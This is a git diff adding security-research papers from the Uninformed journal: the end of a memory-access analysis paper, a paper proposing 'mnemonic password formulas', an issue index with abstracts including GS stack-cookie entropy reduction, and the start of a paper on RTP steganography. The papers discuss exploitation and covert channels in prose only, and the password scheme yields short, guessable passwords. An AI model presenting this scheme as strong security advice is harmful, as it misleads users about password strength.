At this +point, the author has not defined a formal approach that could be taken to +achieve this, but a few rough ideas have been identified. + +The basic idea behind this approach would be to combine memory access behavior +with information about the thread that the access occurred in and the set of +locks that were acquired when the memory access occurred. Determining which +locks are held can be as simple as inserting instrumentation code into the +routines that are used to acquire and release locks at runtime. When a lock +is acquired, it can be pushed onto a thread-specific stack. When the lock is +released, it can be removed. The nice thing about representing locks as a +stack is that in almost every situation, locks should be acquired and released +in symmetric order. Acquiring and releasing locks asymmetrically can quickly +lead to deadlocks and therefore can be flagged as problematic. + +Determining data consistency is quite a bit trickier, however. An analysis +library would need some means of historically tracking read and write access +to different locations in memory. Still, determining what might be a data +consistency issue from this historical data is challenging. One example of a +potential data consistency issue might be if two writes occur to a location in +memory from separate threads without a common lock being acquired between the +two threads. This isn't guaranteed to be problematic, but it is at the very +least be indicative of a potential problem. Indeed, it's likely that many +other types of data consistency examples exist that may be possible to capture +in relation to memory access, thread context, and lock ownership. + +Even if this concept can be made to work, the very fact that it would be a +runtime solution isn't a great thing. It may be the case that code paths that +lead to thread deadlocks or thread-related corruption are only executed rarely +and are hard to coax out. Regardless, the author feels like this represents +an interesting area of future research. + +4) Previous Work + +The ideas described in this paper benefit greatly from the concepts +demonstrated in previous works. The memory mirroring concept described in 2.2 +draws heavily from the PaX team's work relating to their VMA mirroring and +software-based non-executable page implementations[8]. Oded Horovitz provided an +implementation of the paging approach for Windows and applied it to +application security[4]. In addition, there have been other examples that use +concepts similar to those described by PaX to achieve additional results, such +as OllyBone, ShadowWalker, and others[10, 9]. The use of DBI in 2.1 for +memory analysis is facilitated by the excellent work that has gone into +DynamoRIO, Valgrind, and indeed all other DBI frameworks[3, 11]. + +It should be noted that if one is strictly interested in monitoring writes to +a memory region, Windows provides a built-in feature known as a write watch. +When allocating a region with VirtualAlloc, the MEM_WRITE_WATCH flag can be set. +This flag tells the kernel to track writes that occur to the region. These +writes can be queried at a later point in time using GetWriteWatch[6]. + +It is also possible to use guard pages and other forms of page protection, +such as PAGE_NOACCESS, to intercept memory access to a page in user-mode. +Pedram Amini's PyDbg supports the concept of memory breakpoints which are +implemented using guard pages[12]. This type of approach has two limitations +that are worth noting. 
The first limitation involves an inability to pass
+addresses to kernel-mode that have had a memory breakpoint set on them (either
+guard page or PAGE_NOACCESS). If this occurs, it can lead to unexpected
+behavior, such as causing a system call to fail when referencing the
+user-mode address. This would not trigger an exception in user-mode.
+Instead, the system call would simply return STATUS_ACCESS_VIOLATION. As a
+result, an application might crash or otherwise behave improperly. The second
+limitation is that there may be consequences in multi-threaded environments
+where memory accesses are missed.
+
+5) Conclusion
+
+The ability to analyze the memory access behavior of an application at runtime
+can provide additional insight into how an application works. This insight
+might include learning more about how data propagates, deducing the code-level
+isolation of memory references, identifying potential thread safety issues,
+and so on. This paper has described three strategies that can be used to
+intercept memory accesses within an application at runtime.
+
+The first approach relies on Dynamic Binary Instrumentation (DBI) to inject
+instrumentation code before instructions that access memory locations. This
+instrumentation code is then capable of obtaining information about the
+address being referenced when instructions are executed.
+
+The second approach relies on hardware paging features supported by the x86
+and x64 architectures to intercept memory accesses. This works by restricting
+access to a virtual address range to kernel-mode access. When an application
+attempts to reference a virtual address that has been marked as such, an
+exception is generated that is then passed to the user-mode exception
+dispatcher. A custom exception handler can then inspect the exception and
+take the steps necessary to allow execution to continue gracefully after
+having tracked the memory access.
+
+The third approach uses the segmentation feature of the x86 architecture to
+intercept memory accesses. It does this by loading the DS and ES segment
+registers with the null selector. This has the effect of causing instructions
+which implicitly use these registers to generate a general protection fault
+when referencing memory. This fault results in an access violation exception
+being generated that can be handled in much the same way as the hardware
+paging approach.
+
+It is hoped that these strategies might be useful to future research which
+could benefit from collecting memory access information.
+
+References
+
+[1] AMD. AMD64 Architecture Programmer's Manual: Volume 2 System Programming.
+    http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf; accessed 5/2/2007.
+
+[2] Bala, Duesterwald, Banerjia. Transparent Dynamic Optimization.
+    http://www.hpl.hp.com/techreports/1999/HPL-1999-77.pdf; accessed 5/2/2007.
+
+[3] Hewlett-Packard, MIT. DynamoRIO.
+    http://www.cag.lcs.mit.edu/dynamorio/; accessed 4/30/2007.
+
+[4] Horovitz, Oded. Memory Access Detection.
+    http://cansecwest.com/core03/mad.zip; accessed 5/7/2007.
+
+[5] Intel. Intel Architecture Software Developer's Manual Volume 3: System Programming.
+    http://download.intel.com/design/PentiumII/manuals/24319202.pdf; accessed 5/1/2007.
+
+[6] Microsoft Corporation. GetWriteWatch.
+    http://msdn2.microsoft.com/en-us/library/aa366573.aspx; accessed 5/5/2007.
+
+[7] Nethercote, Nicholas. Dynamic Binary Analysis and Instrumentation.
+    http://valgrind.org/docs/phd2004.pdf; accessed 5/2/2007.
+
+[8] PaX Team. PAGEEXEC.
diff --git a/uninformed/7.3.txt b/uninformed/7.3.txt
new file mode 100644
index 0000000..47d66a9
--- /dev/null
+++ b/uninformed/7.3.txt
@@ -0,0 +1,491 @@
+Mnemonic Password Formulas
+I)ruid, C²ISSP
+druid@caughq.org
+http://druid.caughq.org
+5/2007
+
+Abstract
+
+The current information technology landscape is cluttered with a large
+number of information systems that each have their own individual
+authentication schemes. Even with single sign-on and multi-system
+authentication methods, systems within disparate management domains
+are likely to be utilized by users of various levels of involvement
+within the landscape as a whole. Due to this complexity and the
+abundance of authentication requirements, many users are required to
+manage numerous credentials across various systems. This has given rise to
+many different insecurities relating to the selection and management of
+passwords. This paper details a subset of issues facing users and managers of
+authentication systems involving passwords, discusses current approaches to
+mitigating those issues, and finally introduces a new method for password
+management and recall termed Mnemonic Password Formulas.
+
+1) The Problem
+
+1.1) Many Authentication Systems
+
+The current information systems landscape is cluttered with individual
+authentication systems. Even though many systems that exist within a distinct
+management domain utilize single sign-on as well as multi-system
+authentication mechanisms, multiple systems within disparate management
+domains are likely to be utilized regularly by users. Even users at the most
+casual level of involvement in information systems can be expected to
+interface with half a dozen or more individual authentication systems within
+a single day. On-line banking systems, corporate intranet web and database
+systems, e-mail systems, and social networking web sites are a few of the many
+systems that may require their own method of user authentication.
+
+Due to the abundance of authentication systems, many end users are required to
+manage the large numbers of passwords needed to authenticate with these
+various systems. This issue has given rise to many common insecurities related
+to the selection and management of passwords.
+
+In addition to the prevalence of insecurities in password selection and
+management, advances in authentication and cryptographic technology have
+instigated a shift in attack methodologies against authentication systems.
+While recent gains in computing power have made shorter passwords, such as
+those of six characters or less (regardless of the complexity of their
+content), vulnerable to cracking by brute force[4], common attack
+methodologies are moving away from cryptanalytic and brute force methods
+against the password storage or authentication system in favor of intelligent
+guessing of passwords.
This intelligent guessing might involve optimized dictionary attacks and
+user context guesses, attacks against other credentials required by the
+authentication system such as key-cards and password token devices, and
+attacks against the interaction between the user and the systems themselves.
+
+Due to all of the aforementioned factors, the user's password is commonly the
+weakest link in any given authentication system.
+
+1.2) Managing Multiple Passwords
+
+Two of the largest problems with password authentication relate directly to
+the user and how the user manages passwords. First, when users are not allowed
+to write down their passwords, they generally will choose easy to remember
+passwords which are usually much easier to crack than complex passwords. In
+addition to choosing weaker passwords, users are more likely to re-use
+passwords across multiple authentication systems.
+
+Users have an inevitably difficult time memorizing assigned random
+passwords[4] and passwords that they choose themselves under a mandated
+higher level of complexity. When allowed, they may write down their passwords
+in an insecure location such as a post-it note stuck to their computer monitor
+or on a note pad in their desk. Alternatively, they may store passwords
+securely, such as in a password-encrypted file within a PDA. However, a user
+could just as easily lose access to the password store. The user may forget
+the password to the encrypted file, or the PDA could be lost or stolen. In
+either situation, the end result would require some administrative interaction
+in the form of issuing a password reset.
+
+1.3) Poor Password Selection
+
+When left to their own devices, users generally do not choose complex
+passwords[4] and tend to choose easy to crack dictionary words because they
+are easy to remember. Occasionally an attempt will be made at complexity by
+concatenating two words together or adding a number. In many cases, the word
+or words chosen will also be related to, or within the context of, the user
+themselves. This context might include things like a pet's name, a phone
+number, or a birth date.
+
+These types of passwords require much less effort to crack than a brute-force
+trial of the entire range of potential passwords. By using an optimized
+dictionary attack method, common words and phrases are tried first, which
+usually leads to success. Due to the high success rate of this method, most
+modern attacks on authentication systems target guessing the password first
+before attempting to brute-force the password or launch an in-depth attack on
+the authentication system itself.
+
+1.4) Failing Stupid
+
+When a user cannot remember their password, likely because they have too many
+passwords to remember or the password was forced to be too complex for them to
+remember, many authentication systems provide a mechanism that the author has
+termed ``failing stupid.''
+
+When the user ``fails stupid,'' they are asked a reminder question which is
+usually extremely easy for them to answer. If answered correctly, users are
+presented with an option to either reset their password, have it e-mailed to
+them, or perform some other password recovery method. When this type of
+recovery method is available, it effectively reduces the security of the
+authentication system from the strength of the password to the strength of a
+simple question. The answer to this question might even be obtainable through
+public information.
+
+1.4.1) Case Study: Paris Hilton Screwed by Dog
+
+A well publicized user context attack[3] was recently executed against the
+Hollywood celebrity Paris Hilton in which her cellular phone was compromised.
+The account password recovery question that she selected for use with her
+cellular provider's web site was "What is your favorite pet's name?" Many fans
+can most likely recollect from memory the answer to this question, not to
+mention fan web sites, message boards, and tabloids that likely have this
+information available to anyone that wishes to gather it. The attacker simply
+"failed stupid" and reset Hilton's online account password, which then allowed
+access to her cellular device and its data.
+
+2) Existing Approaches
+
+2.1) Write Down Passwords
+
+During the AusCERT 2005 information security conference, Jesper Johansson,
+Senior Program Manager for Security Policy at Microsoft, suggested[2] reversing
+decades of information security best practice of not writing down passwords.
+He claimed that the method of password security wherein users are prohibited
+from writing down passwords is absolutely wrong. Instead, he advocated
+allowing users to write down their passwords. The reasoning behind his claim
+is an attempt at solving one of the problems mentioned previously: when users
+are not allowed to write down their passwords they tend to choose easy to
+remember (and therefore easy to crack) passwords. Johansson believes that
+allowing users to write down their passwords will result in more complex
+passwords being used.
+
+While Mr. Johansson correctly identifies some of the problems of password
+security, his approach to solving them is short-sighted and incomplete. His
+solution addresses users having to remember multiple complex passwords, but
+also creates the aforementioned insecure scenarios regarding written
+passwords, which are inherently less physically secure and prone to require
+administrative reset due to loss.
+
+2.2) Mnemonic Passwords
+
+A mnemonic password is a password that is easily recalled by utilizing a
+memory trick such as constructing passwords from the first letters of easily
+remembered phrases, poems, or song lyrics. An example includes using the
+first letters of each word in a phrase, such as: "Jack and Jill went up the
+hill," which results in the password "JaJwuth". For mnemonic passwords to be
+useful, the phrase must be easy for the user to remember.
+
+Previous research has shown[5] that passwords built from phrase recollection
+like the example above yield passwords with complexity akin to true random
+character distribution. Mnemonic passwords share a weakness with regular
+passwords in that users may reuse them across multiple authentication systems.
+Such passwords are also commonly created using well known selections of text
+from famous literature or music lyrics. Password cracking dictionaries have
+been developed that contain many of these common mnemonics.
+
+2.3) More Secure Mnemonic Passwords
+
+More Secure Mnemonic Passwords[1] (MSMPs) are passwords that are derived from
+simple passwords which the user will remember with ease; however, they use
+mnemonic substitutions to give the password a more complex quality.
+``Leet-speaking'' a password is a simple example of this technique. For
+example, converting the passwords ``beerbash'' and ``catwoman'' into
+leet-speak would result in the passwords ``b33rb4sh'' and ``c@tw0m4n'',
+respectively.
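+
+Mechanically, this kind of substitution is trivial to express. The following
+small C sketch is illustrative only: it assumes one possible substitution
+table (here a becomes 4, e becomes 3, i becomes 1, o becomes 0), while real
+MSMP schemes vary their substitutions (the example above maps one ``a'' to
+``@'' and another to ``4'').
+
+    #include <stdio.h>
+
+    /* One possible leet-speak substitution table; real MSMP schemes vary
+     * (for example, 'a' may become '4' or '@', 's' may become '5' or '$'). */
+    static char leet(char c)
+    {
+        switch (c) {
+        case 'a': return '4';
+        case 'e': return '3';
+        case 'i': return '1';
+        case 'o': return '0';
+        default:  return c;
+        }
+    }
+
+    int main(void)
+    {
+        const char *words[] = { "beerbash", "catwoman" };
+        char buf[64];
+        size_t i, j;
+
+        for (i = 0; i < sizeof(words) / sizeof(words[0]); i++) {
+            for (j = 0; words[i][j] != '\0' && j < sizeof(buf) - 1; j++)
+                buf[j] = leet(words[i][j]);
+            buf[j] = '\0';
+            printf("%s -> %s\n", words[i], buf);  /* b33rb4sh, c4tw0m4n */
+        }
+        return 0;
+    }
+
+A cracking dictionary that applies the same table to a word list recovers
+such passwords just as easily, which is the weakness discussed next.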
+
+A unique problem of MSMPs is that not all passwords can be easily transformed,
+which limits either the choice of available passwords or the password's
+seemingly complex quality. MSMPs also rely on permutations of underlying
+dictionary words or sets of words which are easy to remember. Various cracking
+dictionaries have been developed to attack specific methods of permutation
+such as the "leet-speak" method mentioned above. As with mnemonic passwords,
+these passwords might be reused across multiple authentication systems.
+
+2.4) Pass Phrases
+
+Pass phrases[4] are essentially what is used as the root of a mnemonic password.
+They are easier to remember and much longer, which results in a password that
+is much more resilient to attack by brute force. Pass phrases tend to be much
+more complex due to the use of upper and lower case characters, white-space
+characters, as well as special characters like punctuation and numbers.
+
+However, pass phrases have their own set of problems. Many authentication
+systems do not support lengthy authentication tokens, thus resulting in pass
+phrases that are not consistently usable. Like the aforementioned methods,
+the same pass phrase may be reused across multiple authentication systems.
+
+3) Mnemonic Password Formulas
+
+3.1) Definition
+
+A Mnemonic Password Formula, or MPF, is a memory technique utilizing a
+predefined, memorized formula to construct a password on the fly from various
+context information that the user has available.
+
+3.2) Properties
+
+Given a well designed MPF, the resultant password should have the following
+properties:
+
+ - A seemingly random string of characters
+ - Long and very complex, therefore difficult to crack via brute force
+ - Easy to reconstruct by a user with knowledge of only the formula,
+   themselves, and the target authentication system
+ - Unique for each user, class of access, and authenticating system
+
+3.3) Formula Design
+
+3.3.1) Syntax
+
+For the purposes of this paper, the following formula syntax will be used:
+
+ - <X> : An element, where <X> is meant to be entirely replaced by something
+   known as described by X.
+ - | : When used within an element's angle brackets (< and >), represents an
+   OR value choice.
+ - All other characters are literal.
+
+3.3.2) A Simple MPF
+
+The following simple formula should be sufficient to demonstrate the MPF
+concept. Given the authenticating user and the corresponding authenticating
+system, a formula like that shown in the following example could be
+constructed. This example formula contains two elements: the user and
+the target system, identified either by hostname or by the last octet
+of the IP address.
+
+<user>!<host>
+
+The above MPF would yield such passwords as:
+
+ - "druid!neo" for user druid at system neo.jpl.nasa.gov
+ - "intropy!intropy" for user intropy at system intropy.net
+ - "thegnome!nmrc" for user thegnome at system nmrc.org
+ - "druid!33" for user druid at system 10.0.0.33
+
+This simple MPF schema creates fairly long, easy to remember passwords that
+contain a special character. However, it does not yield very complex
+passwords. A diligent attacker may include the target user and hostname as
+some of the first combinations of dictionary words used in a brute force
+attack against the password. Due to the fact that only the hostname or last
+octet of the IP address is used as a component of the schema, passwords may
+not be unique per system.
If the same user has an account on two different web
+servers, both with hostname "www", or on two different servers with the same
+last address octet value within two different sub-nets, the resultant
+passwords will be identical. Finally, the passwords yielded are variable in
+length and may not comply with a given system's password length policies.
+
+3.3.3) A More Complex MPF
+
+By modifying the simple MPF above, complexity can be improved. Given the
+authenticating user and the authenticating system, an MPF with the following
+components can be constructed:
+
+<u>!<h>.<d>
+
+The more complex MPF contains three elements: <u> represents the first letter
+of the username, <h> represents the first letter of the hostname or the first
+number of the first address octet, and <d> represents the first letters of the
+remaining domain name parts or the first numbers of the remaining address
+octets, concatenated together. This MPF also contains another special
+character in addition to the exclamation mark, the period between the second
+and third element.
+
+The above MPF would yield such passwords as:
+
+ - "d!n.jng" for user druid at system neo.jpl.nasa.gov
+ - "i!i.n" for user intropy at system intropy.net
+ - "t!n.o" for user thegnome at system nmrc.org
+ - "d!1.003" for user druid at system 10.0.0.33
+
+The modified MPF contains two special characters, which yields more complex
+passwords; however, the passwords are still variable in length and may not
+comply with the authenticating system's password length policies. The example
+MPF is also increasing in complexity and may not be easily remembered.
+
+3.3.4) Design Goals
+
+The ideal MPF should meet as many of the following design goals as possible:
+
+ - Contain enough elements and literals to always yield a minimum password
+   length
+ - Contain enough complex elements and literals such as capital letters and
+   special characters to yield a complex password
+ - Elements must be unique enough to yield a unique password per
+   authenticating system
+ - Must be easily remembered by the user
+
+3.3.5) Layered Mnemonics
+
+Due to the fact that MPFs can become fairly complex while attempting to meet
+the first three design goals listed above, a second layer of mnemonic
+properties can be applied to the MPF. The MPF, by definition, is a mnemonic
+technique due to its property of allowing the user to reconstruct the password
+for any given system by remembering only the MPF and having contextual
+knowledge of themselves and the system. Other mnemonic techniques can be
+applied to help remember the MPF itself. This second layer of mnemonics may
+also be tailored to the user of the MPF.
+
+Given the authenticating user and the authenticating system, an adequately
+complex, long, and easy to remember MPF like the following could be
+constructed:
+
+<u>@<h>.<d>;
+
+This MPF contains three elements: <u> represents the first letter of the
+username, <h> represents the first letter of the hostname or the first number
+of the first address octet, and <d> represents the last letter of the domain
+name suffix or the last number of the last address octet. The modified MPF
+also contains a third special character in addition to the at sign and
+period: the semicolon after the final element.
+
+The above MPF would yield such passwords as:
+
+ - "d@n.v;" for user druid at system neo.jpl.nasa.gov
+ - "i@i.t;" for user intropy at system intropy.net
+ - "t@n.g;" for user thegnome at system nmrc.org
+ - "d@1.3;" for user druid at 10.0.0.33
+
+Unlike the previously discussed MPFs, the one mentioned above employs a
+secondary mnemonic technique by reading in a natural way and is thus easier
+for a user to remember. The MPF can be read and remembered as ``user at host
+dot domain,'' which is comparable to the structural format of an email
+address. Also, a secondary mnemonic technique specific to the user of this
+MPF was used by appending the literal semicolon character. This MPF was
+designed by a C programmer who would naturally remember to terminate her
+passwords with semicolons.
+
+3.3.6) Advanced Elements
+
+MPFs can be made even more complex through use of various advanced elements.
+Unlike simple elements, which are meant to be replaced entirely by some static
+value like a username, the first letter of a username, or some part of the
+hostname, advanced elements such as repeating elements, variable elements, and
+rotating or incrementing elements can be used to vastly improve the MPF's
+output complexity. Note, however, that overuse of these types of elements may
+cause the MPF to not meet design goal number four by making the MPF too
+difficult for the user to remember.
+
+ - Repeating Elements
+
+   MPFs may yield longer passwords by repeating simple elements. For
+   example, an element such as the first letter of the hostname may be
+   used twice:
+
+   <u>@<h><h>.<d>;
+
+   Such repeating elements are not required to be sequential, and
+   therefore may be inserted at any point within the MPF.
+
+ - Variable Elements
+
+   MPFs can yield more complex passwords by including variable elements. For
+   example, the MPF designer can prepend the characters "p:" or "b:" to the
+   beginning of the password to include an element indicating whether the
+   target system is a personal or a business system:
+
+   <p|b>:<u>@<h>.<d>;
+
+   To further expand this example, consider a user who performs system
+   administration work for multiple entities. In this case the variable
+   element being prepended could be the first letter of the system's managing
+   entity:
+
+   <e>:<u>@<h>.<d>;
+
+   Here <e> could be replaced by ``p'' for a personal system, ``E'' for a
+   system within Exxon-Mobil's management domain, or ``A'' for a system
+   managed by the Austin Hackers Association. Most of the elements used thus
+   far are relatively simple elements that derive their value from other
+   known contextual information, such as the user or system name, and differ
+   only in how their value changes when the MPF is applied to different
+   systems. Variable elements, by contrast, change value in relation to the
+   context of the class of access or due to a number of other factors outside
+   the basic ``user/system'' context.
+
+   To illustrate this concept, the use of the same MPF for a super-user and an
+   unprivileged user account on the same system may result in passwords that
+   only differ slightly. Including a variable element can help to mitigate
+   this similarity. Prepending the characters ``0:'' or ``1:'' to the
+   resultant password indicates super-user versus unprivileged user access,
+   respectively.
+   Including this additional variable element in the MPF increases the
+   password's complexity as well as indicating the class of access:
+
+   <0|1>:<u>@<h>.<d>;
+
+   Variable elements are not required to prepend the beginning of the formula
+   as with the examples above; they can just as easily be appended or inserted
+   anywhere within the MPF.
+
+ - Rotating and Incrementing Elements
+
+   Rotating and incrementing elements can be included to assist in managing
+   password changes required to conform to password rotation policies. A
+   rotating element is one which rotates through a predefined list of values
+   such as "apple", "orange", "banana", etc. An incrementing element, such as
+   the one represented below by <#>, is derived from an open-ended linear
+   sequence of values to increment through, such as "1", "2", "3" or "one",
+   "two", "three". When a password rotation policy dictates that a password
+   must be changed, rotate or increment the appropriate elements:
+
+   <u>@<h>.<d>;<#>
+
+   The above MPF results in passwords like "d@c.g:1", "d@c.g:2", "d@c.g:3",
+   etc. To further illustrate this principle, consider the following MPF:
+
+   <u>@<h>.<d>;<fruit>
+
+   The above MPF, when used with the predefined list of fruit values mentioned
+   above, yields passwords like "d@c.g:apple", "d@c.g:orange", "d@c.g:banana",
+   etc.
+
+   The only additional pieces of information that the user must remember,
+   other than the MPF itself, are the predefined list of values in the
+   rotating element and the current value of the rotating or incrementing
+   element. (A brief construction sketch using an incrementing element is
+   shown just before Section 3.5.2.)
+
+   In the case of rotating elements this list of values may potentially be
+   written down for easy reference without compromising the security of the
+   password itself. Lists may further be obscured by utilizing certain
+   values, like a grocery list or a list of company employees and telephone
+   extensions that may already be posted within the user's environment. In
+   the case of incrementing elements, knowledge of the current value should be
+   all that is required to determine the next value.
+
+3.4) Enterprise Considerations
+
+Large organizations could use MPFs assigned to specific users to facilitate
+dual-access to a user's accounts across the enterprise. If the enterprise's
+Security Operations group assigns unique MPFs to its users, Security Officers
+would then be able to access a user's accounts without intrusively modifying
+the user's account or password. This type of management could be used for
+account access when a user is absent or indisposed, shared account access
+among multiple staff members or within an operational group, or even
+surveillance of a suspected user by the Security Operations group.
+
+3.5) Weaknesses
+
+3.5.1) The ``Skeleton Key'' Effect
+
+The most significant weakness of passwords generated by MPFs is that when the
+formula becomes compromised, all passwords for systems on which the user is
+using the respective MPF schema are potentially compromised. This situation is
+no worse than a user simply using the same password on all systems. In fact,
+it is significantly better due to the resultant passwords being individually
+unique. When using a password generated by an MPF, the password should be
+unique per system and ideally appear to be a random string of characters. In
+order to compromise the formula, an attacker would likely have to crack a
+significant number of systems' passwords which were generated by the formula
+before being able to identify the correlation between them.
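+
+To make the preceding formulas concrete, the following minimal C sketch
+derives passwords from the layered MPF of Section 3.3.5 with an incrementing
+element appended (<u>@<h>.<d>;<#>), the same kind of element whose interaction
+with password rotation policies is discussed next. The sketch is illustrative
+only; the helper name, element choices, and example systems are not
+prescriptive, since any real MPF should be personal to its user.
+
+    #include <stdio.h>
+    #include <string.h>
+
+    /* Apply the layered MPF <u>@<h>.<d>;<#> where:
+     *   <u> - first letter of the username
+     *   <h> - first letter of the hostname
+     *   <d> - last letter of the fully-qualified name (e.g. 'v' for ".gov")
+     *   <#> - current value of an incrementing element
+     */
+    static void mpf(const char *user, const char *fqdn, int counter,
+                    char *out, size_t outlen)
+    {
+        snprintf(out, outlen, "%c@%c.%c;%d",
+                 user[0], fqdn[0], fqdn[strlen(fqdn) - 1], counter);
+    }
+
+    int main(void)
+    {
+        char pw[32];
+
+        mpf("druid", "neo.jpl.nasa.gov", 1, pw, sizeof(pw));
+        printf("%s\n", pw);    /* d@n.v;1 */
+
+        mpf("intropy", "intropy.net", 2, pw, sizeof(pw));
+        printf("%s\n", pw);    /* i@i.t;2 */
+
+        return 0;
+    }
+
+A rotating element could be handled the same way by indexing into a private
+list of values instead of formatting the counter.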
+
+3.5.2) Complexity Through Password Policy
+
+A second weakness of MPF-generated passwords is that, without rotating or
+incrementing elements, they are not very resilient to password expiration or
+rotation policies. There is a trade-off between the increased password
+security offered by expiring passwords and the added complexity of the MPF;
+in practice, the choice is to accept both or neither. The more secure option
+is to use both; however, this increases the complexity of the MPF, potentially
+causing it to not meet design goal number four.
+
+4) Conclusion
+
+MPFs can effectively mitigate many of the existing risks of complex password
+selection and management by users. However, their complexity and mnemonic
+properties must be managed very carefully in order to achieve a comfortable
+level of password security while also maintaining memorability. Users may
+reintroduce many of the problems MPFs are intended to solve if their formulas
+become too complex to easily remember.
+
+References
+
+[1] Bugaj, Stephan Vladimir. More Secure Mnemonic-Passwords: User-Friendly Passwords for Real Humans.
+    http://www.cs.uno.edu/Resources/FAQ/faq4.html
+
+[2] Kotadia, Munir. Microsoft Security Guru: Jot Down Your Passwords.
+    http://news.com.com/Microsoft+security+guru+Jot+down+your+passwords/2100-7355_3-5716590.html
+
+[3] McWilliams, Brian. How Paris Got Hacked?
+    http://www.macdevcenter.com/pub/a/mac/2005/01/01/paris.html
+
+[4] Williams, Randall T. The Passphrase FAQ.
+    http://www.iusmentis.com/security/passphrasefaq/
+
+[5] Yan, Jeff Jianxin, Alan F. Blackwell, Ross J. Anderson, and Alasdair Grant. Password Memorability and Security: Empirical Results.
+    http://doi.ieeecomputersociety.org/10.1109/MSP.2004.81
diff --git a/uninformed/7.txt b/uninformed/7.txt
new file mode 100644
index 0000000..90e928d
--- /dev/null
+++ b/uninformed/7.txt
@@ -0,0 +1,19 @@
+
+
+Exploitation Technology
+Reducing the Effective Entropy of GS Cookies
+skape
+This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.
+pdf | code.tgz | html | txt
+
+General Research
+Memalyze: Dynamic Analysis of Memory Access Behavior in Software
+skape
+This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.
+pdf | code.tgz | html | txt
+
+Mnemonic Password Formulas
+I)ruid
+The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recall termed Mnemonic Password Formulas.
+pdf | html | txt
+
diff --git a/uninformed/8.1.txt b/uninformed/8.1.txt
new file mode 100644
index 0000000..37f21ae
--- /dev/null
+++ b/uninformed/8.1.txt
@@ -0,0 +1,1723 @@
+Real-time Steganography with RTP
+September, 2007
+I)ruid, C²ISSP
+druid@caughq.org
+http://druid.caughq.org
+
+Abstract: Real-time Transport Protocol (RTP) is used by nearly all
+Voice-over-IP systems to provide the audio channel for calls. As such, it
+provides ample opportunity for the creation of a covert communication channel
+due to its very nature. While use of steganographic techniques with various
+audio cover-medium has been extensively researched, most applications of such
+have been limited to audio cover-medium of a static nature such as WAV or MP3
+file audio data. This paper details a common technique for the use of
+steganography with audio data cover-medium, outlines the issues that arise
+when attempting to use such techniques to establish a full-duplex
+communications channel within audio data transmitted via an unreliable
+streaming protocol, and documents solutions to these problems. An
+implementation of the ideas discussed, entitled SteganRTP, is included in the
+reference materials.
+
+1) Introduction
+
+This paper describes a research effort within the disciplines of
+steganography, Internet telephony, and data communications.
+ +1.1) Overview + +This paper is structured in the following order: The first chapter provides +an introduction, describes the motivation for this research, and covers some +basic concepts and terminology for the subjects of Voice over IP (VoIP), +Real-time Transport Protocol (RTP), Steganography, and, more specifically, the +use of steganography with an audio cover-medium. The second chapter defines +the concept of real-time steganography, discusses using steganography with +RTP, and describes some of the identified problems and challenges. The third +chapter details the reference implementation entitled SteganRTP including a +description of the project's goals, the implementation's operational +architecture, process flow, message data structure, and functional +sub-systems. The fourth chapter addresses the identified problems and +challenges that were met and describes how they were solved. The fifth and +final chapter concludes the paper with observations made as a result of this +research effort. + +1.2) Voice over IP + +The term Voice over IP (VoIP) is nearly synonymous with Internet Telephony. +The majority of VoIP systems are designed to utilize separate signaling and +media channels to provide calling services to users. The signaling channel is +generally used to set-up, manage, and tear-down calls between two or more +parties whereas the media channel is used to transmit the audio, video, or +other media that may be associated with the call. A number of competing +protocol standards exist for use as the VoIP system's signaling channel which +include Session Initiation Protocol (SIP)[1], H.323[2], Skinny[3], and many others. +Real-time Transport Protocol (RTP)[4], however, is used almost ubiquitously to +provide VoIP systems with the required media channel. + +1.3) Real-time Transport Protocol + +Real-time Transport Protocol (RTP) is described by the protocol authors as ``a +transport protocol for real-time applications.'' RTP provides an end-to-end +network transport suitable for applications transmitting real-time data such +as audio, video or any other type of streamed data. RTP generally utilizes +the User Datagram Protocol (UDP)[5] for its transport and can do so in both +multicast or unicast network environments. When employed by a VoIP system, +RTP generally handles the media channel of a call. The call's media channel +is generally handled independent of the VoIP signaling channel. However, per +the RTP specification, there are no default network ports defined. As such, +the RTP endpoint network ports must be negotiated between the endpoints via +the signaling channel. Other events in the signaling channel may also +influence the operation of the media channel as handled by RTP such as +requests to change audio encoding, add or remove parties from the call, or +tear down the call. + +One of RTP's current deficiencies is that it is entirely clear-text while +traversing the network. An RTP profile has been defined for encrypting parts +of the RTP data packet called Secure Real-time Transport Protocol (SRTP)[6]. +However, the specification defines no mechanism for negotiating or securely +exchanging keying information to be used for the encryption and decryption +processes. At the time of this writing, a number of keying mechanisms have +been defined but no standard has either been agreed upon by the standards +bodies or determined by the free market. 
